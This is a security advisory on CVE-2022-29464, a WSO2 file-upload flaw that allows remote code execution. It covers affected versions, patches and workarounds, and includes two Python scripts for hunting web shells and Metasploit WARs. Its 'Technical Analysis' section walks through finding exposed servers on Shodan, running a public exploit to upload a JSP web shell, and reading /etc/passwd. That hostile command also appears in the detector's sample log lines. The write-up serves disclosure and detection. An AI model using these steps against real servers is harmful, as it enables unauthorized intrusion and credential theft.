Introduction:
Since April 2022, we have seen CVE-2022-29464, an unrestricted file upload vulnerability that leads to arbitrary remote code execution (RCE), exploited in the wild. The flaw, publicly disclosed in April 2022 with patches already available, carries a Critical severity rating (CVSS 9.8) and is present in several WSO2 products.
Left unpatched, it gives attackers a way into networks: exploitation requires neither user interaction nor administrator privileges, and no authentication at all.
Vulnerability abuse:
A single malicious Jakarta Server Pages (.JSP, formerly JavaServer Pages) file can be dropped into locations such as /<Install Path for WSO2 Product>/repository/deployment/server/webapps/authenticationendpoint/, which is where we saw web shells installed by exploitation of this flaw.
It is noteworthy that many of the observed attacks closely follow the public PoC, even though the PoC shows that files can also be placed in paths other than /authenticationendpoint/.
Further investigation, however, turned up additional uploaded web application archive (.WAR) files in other locations, most likely dropped by the Metasploit module. The application server's normal deployment routine then extracts Payload.class from the .war, running in the context of the user that owns the WSO2 process:
● /<Install Path for WSO2 Product>/repository/deployment/server/webapps/{5 letters like HcTnA}.war
● /<Install Path for WSO2 Product>/repository/deployment/server/webapps/{5 letters like HcTnA}/WEB-INF/classes/metasploit/Payload.class
We found web shells installed under /authenticationendpoint/ and other locations, using either .JSP or .WAR files, in at least four of the seven affected products. This path appears to be common across WSO2 products.
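The indicators above can be turned into a host-side hunt. The following Python script is an added example (not code from the original write-up, from WSO2 or from Trend Micro): it walks the webapps directory, reports .jsp files under authenticationendpoint/ that are not in a known-good baseline (the stock webapp ships its own JSPs, so flagging every .jsp would be noisy), looks for exploded webapps and .war archives carrying WEB-INF/classes/metasploit/Payload.class, and flags .war files with the five-letter random names described above. The baseline set, the sample directory tree and its file contents are constructed assumptions; build the real baseline from a clean install of your exact product version.

```python
"""Hunt for CVE-2022-29464 post-exploitation artefacts under a WSO2 install.

Added example, not code from the original write-up or from WSO2.
"""
import re
import sys
import tempfile
import zipfile
from pathlib import Path

WEBAPPS_REL = Path("repository/deployment/server/webapps")
AUTH_ENDPOINT = "authenticationendpoint"
PAYLOAD_CLASS = Path("WEB-INF/classes/metasploit/Payload.class")
# The write-up observed five-letter random webapp names such as HcTnA.
RANDOM_WAR_NAME = re.compile(r"^[A-Za-z]{5}$")
# Hypothetical baseline (assumption): generate the real one from a clean install
# of the exact product version, e.g. `find authenticationendpoint -name '*.jsp'`.
BASELINE_JSPS = {"login.jsp", "includes/header.jsp"}


def find_unknown_jsps(webapps, baseline=BASELINE_JSPS):
    """Return .jsp files under authenticationendpoint/ that are not in the baseline."""
    root = webapps / AUTH_ENDPOINT
    if not root.is_dir():
        return []
    return sorted(p for p in root.rglob("*.jsp")
                  if p.relative_to(root).as_posix() not in baseline)


def find_payload_classes(webapps):
    """Return Metasploit Java stager classes inside exploded webapps."""
    if not webapps.is_dir():
        return []
    return sorted(app / PAYLOAD_CLASS for app in webapps.iterdir()
                  if app.is_dir() and (app / PAYLOAD_CLASS).is_file())


def find_suspicious_wars(webapps):
    """Return (war, reasons) for archives with random names or a Metasploit payload inside."""
    if not webapps.is_dir():
        return []
    hits = []
    for war in webapps.glob("*.war"):
        reasons = []
        if RANDOM_WAR_NAME.match(war.stem):
            reasons.append("random five-letter name")
        try:
            with zipfile.ZipFile(war) as zf:
                if PAYLOAD_CLASS.as_posix() in zf.namelist():
                    reasons.append("contains metasploit/Payload.class")
        except zipfile.BadZipFile:
            reasons.append("not a valid zip archive")  # corrupt, or not really a WAR
        if reasons:
            hits.append((war, "; ".join(reasons)))
    return sorted(hits)


def hunt(install_root):
    """Run all three checks against <install_root>/repository/deployment/server/webapps."""
    webapps = Path(install_root) / WEBAPPS_REL
    return {"unknown_jsps": find_unknown_jsps(webapps),
            "payload_classes": find_payload_classes(webapps),
            "suspicious_wars": find_suspicious_wars(webapps)}


def build_sample_install(base):
    """Constructed sample tree: two stock JSPs, one dropped shell, one Metasploit WAR
    (both as archive and exploded), and one benign archive."""
    webapps = base / WEBAPPS_REL
    (webapps / AUTH_ENDPOINT / "includes").mkdir(parents=True)
    (webapps / AUTH_ENDPOINT / "login.jsp").write_text("<%-- stock page --%>")
    (webapps / AUTH_ENDPOINT / "includes" / "header.jsp").write_text("<%-- stock --%>")
    (webapps / AUTH_ENDPOINT / "js.jsp").write_text("<%-- dropped web shell --%>")
    exploded = webapps / "HcTnA" / PAYLOAD_CLASS
    exploded.parent.mkdir(parents=True)
    exploded.write_bytes(b"\xca\xfe\xba\xbe")  # fake class-file magic
    with zipfile.ZipFile(webapps / "HcTnA.war", "w") as zf:
        zf.writestr(PAYLOAD_CLASS.as_posix(), b"\xca\xfe\xba\xbe")
    with zipfile.ZipFile(webapps / "legit-app.war", "w") as zf:
        zf.writestr("index.html", "<html></html>")
    return base


def run_demo():
    """Build the constructed tree in a temp dir and return findings as plain names."""
    with tempfile.TemporaryDirectory() as tmp:
        r = hunt(build_sample_install(Path(tmp)))
        return {"unknown_jsps": [p.name for p in r["unknown_jsps"]],
                "payload_classes": [p.parents[3].name for p in r["payload_classes"]],
                "suspicious_wars": [(w.name, why) for w, why in r["suspicious_wars"]]}


if __name__ == "__main__":
    # With an argument: hunt a real install root. Without: run against the sample tree.
    results = hunt(sys.argv[1]) if len(sys.argv) > 1 else run_demo()
    for key, hits in results.items():
        print(key)
        for hit in hits:
            print("  ", hit)
```

Run it as `python3 hunt.py /<Install Path for WSO2 Product>` on a suspect host; any line under unknown_jsps or payload_classes warrants pulling the file for analysis and treating the host as compromised.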
Product:
This vulnerability allowed unauthenticated and remote attackers to execute arbitrary code in the following products:
API Manager
Identity Server
Identity Server Analytics
Identity Server as Key Manager
Enterprise Integrator
Published Date:
04/01/2022
Impact:
This vulnerability can lead to Remote Code Execution (RCE)
Solution:
Upgrade to the latest patched release (wso2-upgrade-latest)
Execution Summary:
On April 18, 2022, the vulnerability in WSO2 products reported by researcher Orange Tsai was publicly disclosed; it was assigned a CVE number, and patches were made available.
A proof-of-concept exploit was uploaded to GitHub on April 20 by a user with the handle "hakkivi", and the following day we saw it being used against vulnerable environments. A Metasploit module for the vulnerability became available about a week later.
Specifically affected are WSO2 API Manager 2.2.0 and later, Identity Server 5.2.0 and later, Identity Server Analytics 5.4.0 to 5.6.0, Identity Server as Key Manager 5.3.0 and later, Enterprise Integrator 6.2.0 and later, and Open Banking AM and KM 1.4.0 and later.
Affected Versions:
Product | Versions
WSO2 API Manager | 2.2.0 and above
WSO2 Identity Server | 5.2.0 and above
WSO2 Identity Server Analytics | 5.4.0, 5.4.1, 5.5.0, 5.6.0
WSO2 Identity Server as Key Manager | 5.3.0 and above
WSO2 Enterprise Integrator | 6.2.0 and above
WSO2 Open Banking AM | 1.4.0 and above
WSO2 Open Banking KM | 1.4.0 and above
CVSS v3:
Score 9.8 Critical (vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Attack Vector Network
Attack Complexity Low
Privileges Required None
User Interaction None
Confidentiality High
Integrity High
Availability High
Recommendations:
Recommendation #1: Apply Applicable Security Patch
Patches were released for all supported product versions in February 2022.
Use WSO2 Updates to install the necessary fix if you are a WSO2 customer with a Support Subscription.
If you do not have a Support Subscription or are using an end-of-life product, apply the fix from one of the following GitHub pull requests:
● https://github.com/wso2/carbon-kernel/pull/3152
● https://github.com/wso2/carbon-identity-framework/pull/3864
● https://github.com/wso2-extensions/identity-carbon-auth-rest/pull/167
Recommendation #2: Apply Applicable Temporary Workarounds
If the latest security patch cannot be applied, apply the temporary mitigation procedures recommended by WSO2 in its advisory.
The workarounds were evaluated against test cases covering common use cases.
Nevertheless, we advise testing any change in a development environment before rolling it out to production, in line with change-management best practices.
Technical Analysis / Exploits:
1. To reproduce the exploit, first download the public exploit script from GitHub. Use the command below to clone the repository to your local system:
```
git clone https://github.com/devengpk/CVE-2022-29464.git
```
2. After cloning, change into the exploit directory:
```
cd CVE-2022-29464
```
Before running the exploit you need a target. If you do not already have one (and are authorized to test it), open Shodan at the URL below to find publicly exposed WSO2 servers.
https://www.shodan.io/dashboard
In the Shodan search bar, search for WSO2 instances on the default management port:
```
WSO2 port:9443
```
3. Once you have a WSO2 server, run the Python exploit to upload a JSP web shell. The command below uploads a file named js.jsp:
```
python3 exploit.py https://<target server ip:port>/ js.jsp
```
4. Copy the URL printed by the command and open it in a browser.
5. The page that loads presents an input field for running shell commands.
6. Type the desired command into the field and press the Run button. Running ls lists the contents of the current directory (screenshot not reproduced here).
7. Use the command below to list all local user accounts:
```
cat /etc/passwd
```
The output is the contents of the password file, one account per line (screenshot not reproduced here).
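For defenders, the same activity shows up in the HTTP access log: every command sent to the shell above is a request for a .jsp that the stock authenticationendpoint webapp never served, and the Metasploit WAR payload is reached under its random five-letter name. The following Python snippet is an added example (not from the original write-up) that runs both checks over constructed Common Log Format lines and records the first sighting per source and path for the incident timeline. The log layout, the baseline of legitimate JSPs, the IP addresses and the sample lines are all assumptions for illustration; WSO2's actual http_access log format may differ, so adjust LOG_RE to match.

```python
"""Flag CVE-2022-29464 web shell use and Metasploit WAR access in HTTP access logs.

Added example, not code from the original write-up. Sample lines are constructed.
"""
import posixpath
import re
from urllib.parse import unquote

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status ...
# Assumption: adjust to the real layout of your WSO2 http_access log.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)
AUTH_ENDPOINT = "/authenticationendpoint/"
# Hypothetical baseline of JSPs legitimately reachable in the stock webapp (assumption).
BASELINE_JSPS = {"login.jsp"}
# The write-up observed Metasploit WARs deployed under names like HcTnA.
RANDOM_APP = re.compile(r"^[A-Za-z]{5}$")
# Hypothetical allowlist of legitimately deployed five-letter webapp names (assumption).
KNOWN_APPS = set()

# Constructed sample: normal login traffic, then shell commands and a WAR hit from one host.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Apr/2022:10:02:11 +0000] "GET /authenticationendpoint/login.do?client_id=x HTTP/1.1" 200 5120',
    '10.0.0.5 - - [21/Apr/2022:10:02:13 +0000] "GET /authenticationendpoint/login.jsp HTTP/1.1" 200 4200',
    '198.51.100.7 - - [21/Apr/2022:10:03:41 +0000] "GET /authenticationendpoint/js.jsp?cmd=id HTTP/1.1" 200 318',
    '198.51.100.7 - - [21/Apr/2022:10:03:49 +0000] "GET /authenticationendpoint/js.jsp?cmd=cat+/etc/passwd HTTP/1.1" 200 1402',
    '198.51.100.7 - - [21/Apr/2022:10:05:02 +0000] "GET /HcTnA/ HTTP/1.1" 200 0',
]


def normalize_path(target):
    """Strip query string and ;params, percent-decode, collapse ../ and // segments,
    so encoded or traversal-style requests for the same shell are not missed."""
    path = target.split("?", 1)[0].split(";", 1)[0]
    return posixpath.normpath(unquote(path))


def classify(path):
    """Return an indicator name for a normalized path, or None if it looks benign."""
    if path.startswith(AUTH_ENDPOINT) and path.endswith(".jsp"):
        if path[len(AUTH_ENDPOINT):] not in BASELINE_JSPS:
            return "unknown-jsp-in-authenticationendpoint"
    first = path.strip("/").split("/", 1)[0]
    # Weak indicator on its own: cross-check against the webapps actually deployed.
    if RANDOM_APP.match(first) and first not in KNOWN_APPS:
        return "random-five-letter-webapp"
    return None


def detect(lines):
    """Parse log lines and return a finding dict for each matching request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; count these separately in a real deployment
        path = normalize_path(m["target"])
        kind = classify(path)
        if kind:
            findings.append({"kind": kind, "ip": m["ip"], "ts": m["ts"],
                             "path": path, "status": int(m["status"])})
    return findings


def first_seen(findings):
    """Earliest timestamp per (ip, path): where the intrusion timeline starts."""
    seen = {}
    for f in findings:
        seen.setdefault((f["ip"], f["path"]), f["ts"])
    return seen


if __name__ == "__main__":
    hits = detect(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ts']} {f['ip']} {f['kind']} {f['path']} {f['status']}")
    for (ip, path), ts in first_seen(hits).items():
        print(f"first seen {ip} -> {path} at {ts}")
```

A 200 response to an unknown .jsp confirms the file exists on disk, which is the cue to run a filesystem hunt on that host and to pull the full request history for the source address.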
Reference:
● https://github.com/devengpk/CVE-2022-29464.git
● https://nvd.nist.gov/vuln/detail/CVE-2022-29464
● https://www.trendmicro.com/en_us/research/22/e/patch-your-wso2-cve-2022-29464-exploited-to-install-linux-compatible-cobalt-strike-beacons-other-malware.html
● https://www.rapid7.com/db/vulnerabilities/wso2-2021-1738-cve-2022-29464/